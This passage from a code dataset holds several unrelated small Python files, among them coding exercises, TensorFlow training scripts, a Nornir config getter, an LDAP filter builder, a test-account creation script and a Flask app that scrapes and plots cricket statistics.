string.\n\na = input(\"Enter a DNA string: \")\n\nprint(len(a))\n\nc = 0\n\nfor i in a:\n if (i == \"G\" or i == \"C\"):\n c += 1\n\nprint(c/len(a))\n","sub_path":"Lab9.py","file_name":"Lab9.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"568789683","text":"'''\n\nA SÉRIE DE RICCI DEFERE DA SERIE DE FIBONACCI PROQUE OS DOIS PRIMEIROS TERMOS SÃO FORNECIDOS PELO\nUSUÁRIO. 
OS DEMAIS TERMOS SÃO GERADOS DA MESMA FORMA QUE A SERIE DE FIBONACCI. CRIAR UM ALGORITMO\nQUE IMRIMA OS N PRIMEIROS TERMOS DA SERIE DE RICCI E A SOMA DOS TERMOS IMPRESSOS, SABENDO - SE QUE PARA\nEXISTIR ESTA SERIE SERÃO NECESSÁRIO PELO MENOS TRES TERMOS.\n\n'''\n\ntermo = int\n\na1 = int(input('Entre com o primeiro termo: '))\na2 = int(input('Entre com o segundo termo: '))\nn = int(input('Entre com N termos: '))\nsoma = a1 + a2\nif n >= 3:\n print('{} - {}'.format(a1,a2))\n\n for i in range(1,(n-2)+1):\n termo = a1 + a2\n a1 = a2\n a2 = termo\n print(termo, end=' | ')\n soma = soma + termo\n print(soma, end=' ')\nelse:\n print('Não tem termo')","sub_path":"Prog_209_pag_150.py","file_name":"Prog_209_pag_150.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"590236572","text":"import json\r\nfrom collections import namedtuple\r\nimport discord\r\n\r\ndef read_json_as_tuple(file):\r\n try:\r\n with open(file, encoding='utf8') as data:\r\n return json.load(data, object_hook=lambda d: namedtuple('X', d.keys())(*d.values()))\r\n except Exception as e:\r\n print(e)\r\n\r\ndef read_json_raw(file):\r\n try:\r\n with open(file, encoding='utf8') as data:\r\n return json.load(data)\r\n except Exception as e:\r\n print(e)\r\n\r\ndef write_json(data, file):\r\n try:\r\n with open(file, 'w') as file:\r\n json.dump(data, file, indent=2)\r\n except Exception as e:\r\n print(e)\r\n\r\ndef load_extension(bot, extension):\r\n try:\r\n bot.load_extension(extension)\r\n except Exception as e:\r\n print(f'Failed to load extension {extension}: {e}')\r\n\r\ndef is_command(commands, compare_text):\r\n for c in commands:\r\n if c.name == compare_text:\r\n return True\r\n return False","sub_path":"utils/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"423934125","text":"import os, sys\nsys.path.append(os.pardir)\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom sklearn.utils import shuffle\nimport shutil\nfrom scipy.io import loadmat\nfrom load_foot import Load_data, make_data\nfrom module.utility.history import History, Real_time_plot, EarlyStopping\nfrom module.basics.my_layers import bidirectional_LSTM, time_stacked_conv1d, accuracy\n\n\n'''\nモデルハイパーパラメータ\n'''\nseq_len = 128\nfreq = 64\nlr = 1e-4\nepochs = 1000\nbatch_size = 512\nk_prob = 0.6\nnum_sample = 100\n\n# early_stopping\nstop = False\n'''\nデータの生成\n'''\nos.chdir('data')\n\ntrain, train_label, test, test_label \\\n = make_data(train_mat = \"train_foot2.mat\",\n test_mat = \"test_foot2.mat\",\n train_label_mat = \"label_foot.mat\",\n test_label_mat = \"label_foot.mat\",\n seq_len=seq_len)\n\nplot_x = np.r_[train, test]\nplot_t = np.r_[train_label, test_label]\n\nN_train = len(train)\nn_batches = N_train // batch_size\nvector_dim = train.shape[2]\n\ntrain = train.reshape(-1, seq_len, vector_dim, 1)\ntest = test.reshape(-1, seq_len, vector_dim, 1)\n\n'''\n計算グラフ構築\n'''\nwith tf.variable_scope(\"Input\"):\n x = tf.placeholder(dtype=tf.float32, shape=[None, train.shape[1:]])\nwith tf.variable_scope(\"Target\"):\n t = tf.placeholder(dtype=tf.float32, shape=[None, 2])\nwith tf.variable_scope(\"dropout\"):\n keep_prob = tf.placeholder(dtype=tf.float32)\nwith tf.variable_scope(\"batch_normalization\"):\n b_n_on = tf.placeholder(dtype=tf.bool)\n\nh = x\n\nwith tf.variable_scope(\"conv-FIR\"):\n h = 
tf.layers.conv2d(h, filters=16, kernel_size=(6, 1), padding='same',\n activation=tf.nn.relu, use_bias=False)\n h = tf.nn.dropout(h, keep_prob=keep_prob)\n\n h = tf.layers.batch_normalization(h, training=b_n_on, axis=3)\n h = tf.layers.conv2d(h, filters=32, kernel_size=(6, 1), padding='same',\n activation=tf.nn.relu, use_bias=False)\n h = tf.layers.max_pooling2d(h, pool_size=(2, 1), strides=(2, 1))\n h = tf.nn.dropout(h, keep_prob=keep_prob)\n\n h = tf.layers.batch_normalization(h, training=b_n_on, axis=3)\n h = tf.layers.conv2d(h, filters=freq, kernel_size=(4, 1), padding='same',\n activation=tf.nn.relu, use_bias=False)\n h = tf.layers.max_pooling2d(h, pool_size=(2, 1), strides=(2, 1))\n h = tf.nn.dropout(h, keep_prob=keep_prob)\n\n\nwith tf.variable_scope(\"spatial_filter\"):\n h = tf.layers.batch_normalization(h, training=b_n_on, axis=2)\n h = tf.layers.conv2d(h, filters=freq, kernel_size=(1, 5), padding='same',\n activation=tf.nn.relu, use_bias=False)\n h = tf.layers.average_pooling2d(h, pool_size=(1, 5), strides=(1, 5))\n\n# with tf.variable_scope(\"RNN\"):\n# h = tf.unstack(h, None, 1)\n# cell = tf.contrib.rnn.LayerNormBasicLSTMCell(50, dropout_keep_prob=keep_prob)\n# att_cell = tf.contrib.rnn.AttentionCellWrapper(cell, attn_length=4)\n# h, _ = tf.contrib.rnn.static_rnn(att_cell, h, dtype=tf.float32)\n# h = h[-1]\n\nwith tf.variable_scope(\"dense\"):\n h = tf.contrib.layers.flatten(h)\n# h = tf.layers.batch_normalization(h, training=b_n_on)\n h = tf.layers.dense(inputs=h, units=256, activation=tf.nn.relu)\n# h = tf.layers.batch_normalization(h, training=b_n_on)\n h = tf.layers.dense(inputs=h, units=2, activation=tf.nn.relu)\n y = tf.nn.softmax(h)\n\nwith tf.variable_scope(\"loss\"):\n loss = tf.reduce_mean(-tf.reduce_sum(\n t * tf.log(tf.clip_by_value(y, 1e-10, 1.0)),\n reduction_indices=[1]))\n tf.summary.scalar(\"loss\", loss)\n\nwith tf.variable_scope(\"train_step\"):\n optimizer = tf.train.AdamOptimizer()\n train_step = optimizer.minimize(loss)\n\n'''\n学習\n'''\n\nprint(\"-------Session initialize--------\")\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nwriter = tf.summary.FileWriter(\"./logs/nn_logs\", sess.graph)\nmerged = tf.summary.merge_all()\nsess.run(init)\ntr_feed = {x: train, t: train_label, keep_prob: 1.0, b_n_on: False}\n\nprint(\"-------start training-------\")\nfor epoch in range(epochs):\n X_, Y_ = shuffle(train, train_label)\n\n for i in range(n_batches):\n start = i * batch_size\n end = start + batch_size\n\n sess.run(train_step, feed_dict={\n x: X_[start:end],\n t: Y_[start:end],\n keep_prob: k_prob,\n b_n_on: True\n })\n\n training_loss = sess.run(loss, feed_dict={\n x: train,\n t: train_label,\n keep_prob: 1.0,\n b_n_on: False\n })\n\n summary = sess.run(merged, feed_dict=tr_feed)\n writer.add_summary(summary, epoch)\n\n print(\"epoch:{}\\n training_loss:{}\".format(\n epoch, training_loss))\n\nprint(\"-------finish training-------\")\n\nhist = np.zeros(train_label.shape)\nfor i in range(num_sample):\n probability = sess.run(y, feed_dict={\n x: train,\n keep_prob: k_prob,\n b_n_on: False\n })\n inf = np.eye(2)[np.argmax(probability, 1)]\n hist += inf\nhist /= num_sample\ncorrect_prediction = np.equal(np.argmax(hist, 1), np.argmax(train_label, 1))\naccuracy = np.mean(correct_prediction.astype(np.float32))\n\nprint(\"train_accuracy:{}\".format(accuracy))\n\nplt.plot(np.argmin(hist, 1))\nplt.plot(np.argmin(train_label, 
1))\nplt.show()\n","sub_path":"end2end/end2end.py","file_name":"end2end.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"90680874","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date    : 2019/10/24 13:55\n# @Author  : RoryXiang (pingping19901121@gmail.com)\n# @Link    : \"\"\n# @Version : 1.0\n\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.preprocessing import LabelBinarizer\n# LabelBinarizer turns non-binary labels into one-hot vectors: [\"yes\", \"no\"] -> [1, 0]\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_digits\n\n\ndigits = load_digits()\nx_data = digits.data\ny_data = digits.target\ny_data = LabelBinarizer().fit_transform(y_data)\n\nx_train, x_test, y_train, y_test = train_test_split(\n    x_data, y_data, test_size=0.3)\n\n\ndef add_layer(input, input_size, output_size, layer_name,\n              activation_function=None):\n    weights = tf.Variable(tf.random.normal([input_size, output_size]),\n                          dtype=np.float32)\n    biases = tf.Variable(tf.zeros([1, output_size]) + 0.1)\n    wx_plus_bias = tf.add(tf.matmul(input, weights), biases)\n    # use the fed keep_prob placeholder rather than a hard-coded 0.1,\n    # which would drop 90% of the activations regardless of the feed_dict\n    wx_plus_bias = tf.nn.dropout(wx_plus_bias, keep_prob=keep_prob)\n    if activation_function:\n        output = activation_function(wx_plus_bias)\n    else:\n        output = wx_plus_bias\n    return output\n\n\nxs = tf.placeholder(tf.float32, [None, 64])\nys = tf.placeholder(tf.float32, [None, 10])\nkeep_prob = tf.placeholder(tf.float32)\n\nl1 = add_layer(xs, 64, 50, \"l1\", activation_function=tf.nn.tanh)  # l1\nprediction = add_layer(l1, 50, 10, \"l2\", activation_function=tf.nn.softmax)\n# l2\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(ys * tf.log(prediction),\n                                              reduction_indices=[1]),\n                               )\n# cross_entropy is a scalar, so log it with tf.summary.scalar\n\ntf.summary.scalar(\"loss\", cross_entropy)\ntrain_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n    # merge all summaries\n    merged = tf.summary.merge_all()\n    # FileWriters for the summaries\n    train_writer = tf.summary.FileWriter(\"logs/train/\", sess.graph)\n    test_writer = tf.summary.FileWriter(\"logs/test/\", sess.graph)\n\n    sess.run(init)\n    for i in range(1000):\n        sess.run(train_step, feed_dict={xs: x_train,\n                                        ys: y_train,\n                                        keep_prob: 0.5})\n        if i % 50 == 0:\n            train_loss = sess.run(merged, feed_dict={xs: x_train,\n                                                     ys: y_train,\n                                                     keep_prob: 0.5})\n            test_loss = sess.run(merged, feed_dict={xs: x_test,\n                                                    ys: y_test,\n                                                    keep_prob: 0.5})\n            # train_writer.add_summary(train_loss, i)\n            # mm = tf.compat.as_str(train_loss)\n            print(\"train loss: \", train_loss, \" test loss: \", test_loss)","sub_path":"basic/dropout.py","file_name":"dropout.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"98923361","text":"#!/usr/bin/env python\n\nfrom nornir import InitNornir\nfrom nornir.plugins.tasks.networking import napalm_get\nfrom nornir.core.filter import F\nfrom pprint import pprint\n\ndef main():\n    nr = InitNornir(config_file=\"config.yaml\")\n    nxos = nr.filter(F(platform=\"nxos\"))\n    results = nxos.run(\n        task = napalm_get,\n        getters = \"config\",\n        getters_options = {\"config\": {\"retrieve\": \"running\"}}\n    )\n    for host, multi in results.items():\n        print(\"=\" * 80)\n        print(f\"Device {host}\")\n        pprint(multi[0].result)\n\n\nif __name__ == \"__main__\":\n    
main()\n","sub_path":"wk3/ex6/ex6b.py","file_name":"ex6b.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"522952715","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/5/24 4:08 PM\n# @Author: lixiaomeng_someday\n# @Email : 131xxxx119@163.com\n# @File : TP_02_remove_duplicates.py\n\n\n\"\"\"\nstory:\n    Given an array of sorted numbers, remove all duplicates from it.\n    You should not use any extra space;\n    after removing the duplicates in-place return the new length of the array.\n\nanalysis:\n    1. the array is sorted\n    2. the unique elements form a prefix subset we keep in place\n\ninstance:\n    Input: [2, 3, 3, 3, 6, 9, 9]\n    Output: 4\n    Explanation: The first four elements after removing the duplicates will be [2, 3, 6, 9].\n\n\"\"\"\n\n# method 1: deduplicate with a set\n\n\n# def remove_duplicates(array: list)->set:\n#     un_duplicates_array = set(array)\n#     return un_duplicates_array\n#\n#\n# def main():\n#     arr_1 = [2, 3, 3, 3, 6, 9, 9]\n#     print(remove_duplicates(arr_1))\n#\n#\n# if __name__ == \"__main__\":\n#     main()\n\n\n# method 2: two-pointer technique\n# one pointer scans the array; the other marks the last unique element and\n# only advances when a new (non-duplicate) element is found\n\ndef remove_duplicates(array: list):\n    pointer_unduplicates: int = 0\n    pointer_iterable: int = 1\n    unduplicates_element_length: int = 1\n    while pointer_iterable <= len(array) - 1:\n        if array[pointer_iterable] - array[pointer_unduplicates] != 0:\n            unduplicates_element_length += 1\n            pointer_unduplicates = pointer_iterable\n\n        pointer_iterable += 1\n    # return only the new length, as the problem statement asks (Output: 4 for the example)\n    return unduplicates_element_length\n\n\ndef main():\n    arr_1 = [2, 3, 3, 3, 6, 9, 9]\n    print(remove_duplicates(arr_1))\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"xm02_array_two_pointers/TP_02_remove_duplicates.py","file_name":"TP_02_remove_duplicates.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"268466069","text":"from math import sqrt\nimport Stumpff\n\nmu = 398600\n\ndef compute_chi(r0, vr0, a, delta_t):\n    alpha = 1 / a\n    chi = sqrt(mu) * abs(alpha) * delta_t\n    z = alpha * (chi) ** 2\n\n    ratio = 1\n    tolerance = 10**(-6)\n\n    def compute_fchi(r0, vr0, delta_t):\n        A = (r0 * vr0 / sqrt(mu)) * (chi) ** 2 * Stumpff.stumpC(z)\n        B = (1 - alpha * r0) * (chi) ** 3 * Stumpff.stumpS(z)\n        C = r0 * chi - (sqrt(mu) * delta_t)\n        return A + B + C\n\n    def compute_fchi_derivative(r0, vr0):\n        D = (r0 * vr0 / sqrt(mu)) * (chi) * (1 - (alpha * (chi) ** 2 * Stumpff.stumpS(z)))\n        E = (1 - alpha * r0) * (chi) ** 2 * Stumpff.stumpC(z) + r0\n        return D + E\n\n    while abs(ratio) > tolerance:\n        # z must be recomputed from the current chi on every Newton step,\n        # not frozen at the initial guess\n        z = alpha * chi ** 2\n        ratio = compute_fchi(r0, vr0, delta_t) / compute_fchi_derivative(r0, vr0)\n        chi = chi - ratio\n\n    return chi\n\ndef main():\n    chi = compute_chi(r0=14000, vr0=-2.6679, a=14000, delta_t=3600)\n    #chi = compute_chi(r0=10000, vr0=3.0752, a=-19655, delta_t=3600)\n    print(chi)\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"UniversalAnomaly.py","file_name":"UniversalAnomaly.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"271422412","text":"#!/usr/bin/env python\n\n\"\"\"\n\nWrite the shortest possible code which converts tabs to spaces in the input. Tab size should be supplied as a parameter or be hardcoded in the code in a single place.\n\nSpaces on output should point to the right column, e.g. 
(\\t represents a tab character):\n\na\\tb\naa\\tb\naaa\\tb\naaaa\\tb\nshould become (for tab size 4):\n\na   b\naa  b\naaa b\naaaa    b\nOf course there can be more than one tab in a line.\n\nLine separator and tab character should match the system defaults (e.g. ASCII 10 and 9 on Unix).\n\n\"\"\"\n\ndef convert(s):\n    r = \"\"\n    col = 0\n    for c in s:\n        if c != '\\t':\n            r += c\n            col += 1\n        else:\n            # advance to the next multiple-of-4 column; bumping the counter by\n            # only one per character broke lines with more than one tab\n            pad = 4 - (col % 4)\n            r += \" \" * pad\n            col += pad\n    return r\n\ndef main():\n    assert(convert(\"a\\tb\") == \"a   b\")\n    assert(convert(\"aa\\tb\") == \"aa  b\")\n    assert(convert(\"aaa\\tb\") == \"aaa b\")\n    assert(convert(\"aaaa\\tb\") == \"aaaa    b\")\n\nmain()\n","sub_path":"codegolf/convert-tabs-to-spaces.py","file_name":"convert-tabs-to-spaces.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"58903127","text":"from ldap3.utils.conv import escape_filter_chars\nfrom parse import compile\n\"\"\"\nvery poor man's LDAP filter handling;\nonly stacking up AND (&) filters is supported for now\n\"\"\"\n\n\nclass LdapFilterParam(object):\n    def __init__(self, attrname, attrvalue):\n        self.attrname = attrname\n        self.attrvalue = attrvalue\n\n    def __repr__(self):\n        val = escape_filter_chars(self.attrvalue)\n        fstr = \"({}={})\".format(self.attrname, val)\n        return fstr\n\n\nclass LdapFilter(object):\n    p = compile(\"{}={}\")\n\n    def __init__(self, parameter=None):\n        self.parameters = list()\n        if parameter:\n            (attrname, attrvalue) = self.p.parse(parameter)\n            filter_param = LdapFilterParam(attrname, attrvalue)\n            self.parameters.append(filter_param)\n        return\n\n    def add(self, attrname, attrvalue):\n        param = LdapFilterParam(attrname, attrvalue)\n        self.parameters.append(param)\n        return\n\n    def filter_string(self):\n        filter_string = \"(objectClass=*)\"\n        if len(self.parameters) == 1:\n            filter_string = str(self.parameters[0])\n        if len(self.parameters) > 1:\n            param_strings = []\n            for param in self.parameters:\n                param_strings.append(str(param))\n            filter_string = \"(&\" + \"\".join(param_strings) + \")\"\n        return filter_string\n\n    def __repr__(self):\n        r = self.filter_string()\n        return r\n","sub_path":"classes/ldapfilter.py","file_name":"ldapfilter.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"247511234","text":"#!/usr/bin/env python3\n\nimport argparse\nimport binascii\nimport json\n\nfrom uplink import *\n\n\n# Command-line arguments\nparser = argparse.ArgumentParser(prog='create-test-asset',\n                                 description='''\nThis script creates some accounts with a 'Name' metadata\nfield, and outputs the account keys and addresses as JSON.\n''')\n\nargs = parser.parse_args()\n\n\n# Connect to Uplink\nrpc = UplinkJsonRpc(host=\"localhost\", port=8545, tls=False)\n\n# Create test accounts\ndef create_account(rpc, name):\n    pubkey, skey = ecdsa_new()\n\n    metadata = dict(Name=name)\n\n    txhash, address = rpc.uplink_create_account(\n        private_key=skey,\n        public_key=pubkey,\n        from_address=None,\n        metadata=metadata,\n        timezone=\"CET\"\n    )\n\n    return {\n        'name': name,\n        'address': address,\n        'public_key': binascii.b2a_hex(pubkey.to_string()).decode(),\n        'private_key': binascii.b2a_hex(skey.to_string()).decode()\n    }\n\naccounts = []\nfor name in [\"Alice\", \"Bob\", \"Charlie\", \"David\"]:\n    accounts.append(create_account(rpc, name))\nprint(json.dumps(accounts, sort_keys=True, 
+{"seq_id":"247511234","text":"#!/usr/bin/env python3\n\nimport argparse\nimport binascii\nimport json\n\nfrom uplink import *\n\n\n# Command-line arguments\nparser = argparse.ArgumentParser(prog='create-test-asset',\n                                 description='''\nThis script creates some accounts with a 'Name' metadata\nfield, and outputs the account keys and addresses as JSON.\n''')\n\nargs = parser.parse_args()\n\n\n# Connect to Uplink\nrpc = UplinkJsonRpc(host=\"localhost\", port=8545, tls=False)\n\n# Create test accounts\ndef create_account(rpc, name):\n    pubkey, skey = ecdsa_new()\n\n    metadata = dict(Name = name)\n\n    txhash, address = rpc.uplink_create_account(\n        private_key=skey,\n        public_key=pubkey,\n        from_address=None,\n        metadata=metadata,\n        timezone=\"CET\"\n    )\n\n    return {\n        'name': name,\n        'address': address,\n        'public_key': binascii.b2a_hex(pubkey.to_string()).decode(),\n        'private_key': binascii.b2a_hex(skey.to_string()).decode()\n    }\n\naccounts = []\nfor name in [\"Alice\", \"Bob\", \"Charlie\", \"David\"]:\n    accounts.append(create_account(rpc, name))\nprint(json.dumps(accounts, sort_keys=True, indent=4))\n","sub_path":"scripts/create-test-accounts.py","file_name":"create-test-accounts.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"479892666","text":"from flask import Flask,url_for,render_template,jsonify,request,send_from_directory,redirect;\nimport logging as lg;\nimport loggin as domain;\nimport os;\nimport jinja2;\nfrom flask_socketio import SocketIO;\nfrom flask_sock import Sock\nfrom mongodbsetup import createMongoConnectionObject;\nfrom bs4 import BeautifulSoup as bs;\nfrom selenium import webdriver\nfrom selenium.webdriver.common import keys\nimport requests as rs\nfrom selenium.webdriver.chrome.options import Options\nimport pandas as pd;\nimport time as te;\nimport plotly.offline as po;\nimport plotly.express as px;\nimport plotly.graph_objects as go;\n# import scrapy as scrap;\ncrome_driver_path = 'E:/inuron/videos/scraping and seaborn/chromedriver.exe';\n\nchrome_options = Options()\nchrome_options.add_argument(\"--headless\")\n # chrome_options.add_argument(\"--window-size=%s\" % WINDOW_SIZE)\n # chrome_options.binary_location = CHROME_PATH\n\n\n\n\n# driver.get('https://www.espncricinfo.com/')\n# zz=driver.find_element_by_xpath(\"//a[@data-hover='Teams']\")\n\n# zz.click();\n# az=driver.find_element_by_xpath(\"//*[@id='navbarSupportedContent']/ul[2]/div/li\")\n\n# az.click()\n# pp=driver.find_element_by_xpath(\"//*[@id='navbarSupportedContent']/ul[2]/div/div/div/form/input\")\n# pp.send_keys('Sachin');\n# pp.send_keys(keys.ENTER);\n# zz=driver.find_element_by_xpath(\"//*[@id='navbarSupportedContent']/ul[2]/div/div/div/form/button\")\n\n# zz.click();\nprint('gggggggggggggggggggggggggggggggggggggggggggggggggggg')\n# print(driver.page_source)\n# bs=BeautifulSoup(driver.page_source,'html.parser')\n# ele=bs.xpath(\"//*[@id='navbarSupportedContent']/ul[2]/div/div/div/form/input\")\n# print(bs)\n# driver.close()\n# zz=rs.get('https://www.espncricinfo.com/')\n# for i in :\n # print(i)\n# kk=[i for i in zz]\n# print(kk) \nloger=domain.loggin()\ndoimanFile=loger.writingInfile();\ndomainConsole=loger.writeInConsolo();\n\ndb_connection=createMongoConnectionObject();\nmain_db=db_connection.sendMongoConnection()\ndomainConsole.info('mongo connection succeeded');\nprint(main_db)\n\n######################\nvsTeam='#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > div:nth-child(3) > div';\ninHostCountry = '#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > div:nth-child(4) > div'\ninContinent = '#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > div:nth-child(5) > div'\nhomeVsAway = '#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > div:nth-child(6) > div'\nbyEar= '#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > div:nth-child(7) > div'\n \n# try:\n# zk=main_db['sub']\n# collections1=zk['super']\n# collections1.insert_one({'name':'happy'})\n# print(main_db.list_database_names())\n# print('inserted')\n# except Exception as 
e:\n# domainConsole.error('Error inserting');\n# doimanFile.error(f'Error inserting2')\n# template_dir = os.path.join(template_dir,'\\practice\\flaskProject\\template')\n# domain.logger.error(template_dir)\napp = Flask(__name__, template_folder ='views', static_folder='stastic');\n\n# app.config['SECRET_KEY'] = 'secret!'\n# socketio = SocketIO(app)\n# sock = Sock(app)\n\n# my_loader = jinja2.ChoiceLoader([\n# app.jinja_loader,\n# jinja2.FileSystemLoader(['/flaskProject/views']),\n# ])\n\n\n# app.jinja_loader = my_loader\n@app.route('/uploadimg',methods=[\"GET\"]) \ndef homePage():\n # domain.view_log.info('This is a warning message') \n # domain.logger.error('This is an error message') \n # domain.logger.critical('Dheeraj')\n \n domainConsole.info('This is a warning message') \n domainConsole.error('This is an error message') \n doimanFile.critical('Dheeraj File')\n \n # logg.error('hii')\n # ap0=os.path.join(template_dir,'homePage','home.html',template_folder='folder1')\n # return render_template('homePage\\home.html',template_folder=template_dir);\n replies = {'Jack':'Cool post',\n\t\t\t 'Jane':'+1',\n\t\t\t 'Erika':'Most definitely',\n\t\t\t 'Bob':'wow',\n\t\t\t 'Carl':'amazing!'};\n \n # return send_from_directory('views','homePage/home.html') \n return render_template('homePage/home2.html',replies=replies)\n # views\\homePage\\home.html\n \n@app.route('/resiveScrapingUrl',methods=['POST'])\ndef geturl():\n print(request.form['scrapingUrl']);\n driver = webdriver.Chrome(executable_path=crome_driver_path)\n driver.get(request.form['scrapingUrl'])\n \n # selectedElement=driver.find_element_by_css_selector('#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > div:nth-child(3) > div')\n selectorDropdown=driver.find_element_by_css_selector('#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > div.player_stats-header.d-flex.justify-content-between.align-items-center > div > div > div:nth-child(1) > button')\n selectorDropdown.click()\n if (request.form['matchFormat'] == 'Test') :\n try :\n \n \n selectfiefd=driver.find_element_by_css_selector('#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > div.player_stats-header.d-flex.justify-content-between.align-items-center > div > div > div:nth-child(1) > div > div > ul > li.ci-dd__selected-option')\n selectfiefd.click()\n except Exception as e:\n domainConsole.error(e) \n doimanFile.critical(e)\n \n if (request.form['matchFormat'] == 'odi') :\n try :\n \n selectfiefd=driver.find_element_by_css_selector('#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > div.player_stats-header.d-flex.justify-content-between.align-items-center > div > div > div:nth-child(1) > div > div > ul > li:nth-child(2)')\n selectfiefd.click() \n except Exception as e :\n domainConsole.error(e) \n doimanFile.critical(e)\n \n if (request.form['matchFormat'] == 'Test') :\n try:\n \n \n selectfiefd=driver.find_element_by_css_selector('#main-container > div:nth-child(1) > div > div.container > div > div.playerpage-content > div.card.stats_mobile-negative-margin.player-stats-containter-mobile-bp > 
div.player_stats-header.d-flex.justify-content-between.align-items-center > div > div > div:nth-child(1) > div > div > ul > li:nth-child(3)')\n selectfiefd.click()\n except Exception as e :\n domainConsole.error(e) \n doimanFile.critical(e)\n vs='' \n if (request.form['vs'] == 'vs Team') :\n vs=vsTeam;\n if (request.form['vs'] == 'In Host Country') :\n vs=inHostCountry; \n if (request.form['vs'] == 'in Continent') :\n vs=inContinent; \n if (request.form['vs'] == 'Home vs Away') :\n vs=homeVsAway; \n if (request.form['vs'] == 'By Year') :\n vs=byEar; \n \n te.sleep(5)\n selectedElement=driver.find_element_by_css_selector(vs)\n \n table=selectedElement.get_attribute('innerHTML');\n soupobj=bs(table,'html.parser')\n \n allLinksinTable = soupobj.find_all('a')\n \n \n dataframe=pd.read_html(table)\n fig0=[];\n \n for i in list(dataframe[0].index):\n fig0.append(go.Scatter(x=[dataframe[0]['Span'][i]],y=[dataframe[0]['Runs'][i]],mode='markers',name=str(dataframe[0]['Title'][i]),hovertemplate=f\"HS:{[dataframe[0]['HS'][i]]}
    AVG:{[dataframe[0]['Avg'][i]]}\"))\n \n fig0.append(go.Scatter(x=dataframe[0]['Span'],y=dataframe[0]['Runs'],mode=\"lines\"))\n fig=go.Figure(data=fig0)\n po.plot(fig,filename=\"views/homePage/first_figure.html\",auto_open=False)\n te.sleep(5)\n driver.close()\n # return redirect(url_for('http://localhost:8000/graphview'))\n return {'uri':'/graphview'}\n\n@app.route('/graphview')\ndef showGraph():\n return render_template('homePage/first_figure.html')\n \n@app.route('/',methods=['GET'])\ndef vedioPage():\n try :\n return render_template('homePage/home.html') \n except Exception :\n \n domainConsole.error('video page rendring error') \n doimanFile.critical('video page rendring error')\n \n# @socketio.on('connecteduser')\n# def showConnectedMsg(data):\n# print(data) \n\n # while True:\n # data = ws.receive()\n # ws.send(data)\n \nif __name__ == '__main__':\n app.run(host=\"localhost\", port=8000, debug=True); \n # socketio.run(app,host=\"localhost\", port=3030, debug=True)\n # websockets.serve('hello', \"localhost\", 8765); \n ","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"252668050","text":"import random\n\n''' Python provides a really easy way of\n of writing the coin toss program. Over\n here we will be using the random function.\n Using this, we will provide the values 0\n and 1 to denote heads and tails.\n '''\n\ndef coin_toss():\n\n heads = 0\n tails = 0\n\n while True:\n prompt = \"Enter to flip coin. Press ctrl + z to exit\"\n input(prompt)\n\n # Use the random function to flip the coin\n # Heads is denoted by 0\n # Tails is denoted by 1\n toss = random.randint(0, 1)\n\n if toss == 0:\n heads += 1\n \n else:\n tails += 1\n\n print(\"Heads: \", heads)\n print(\"Tails: \", tails)\n\ncoin_toss()\n \n","sub_path":"coinflip.py","file_name":"coinflip.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"270118847","text":"from sklearn.tree import DecisionTreeClassifier\r\n\r\nimport pandas as pd\r\nimport Features\r\n\r\ndata = 